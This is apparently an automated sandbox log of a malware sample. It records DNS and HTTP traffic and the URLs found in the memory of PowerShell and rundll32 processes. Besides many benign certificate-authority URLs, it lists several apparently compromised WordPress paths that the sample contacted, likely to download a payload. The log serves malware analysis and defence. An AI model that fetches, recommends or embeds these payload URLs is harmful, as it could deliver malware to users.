Source: global traffic	HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive

Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: nightlifemumbai.club

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 19:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000005.00000002.2334453493.000000001CFB8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2334750882.000000001D05F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000002.2326330204.00000000001B2000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT6_v
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp	String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0J
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0/
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp	String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.1
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://jflmktg.wpcomstaging.com
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp	String found in binary or memory: https://shop.nowfal.dev
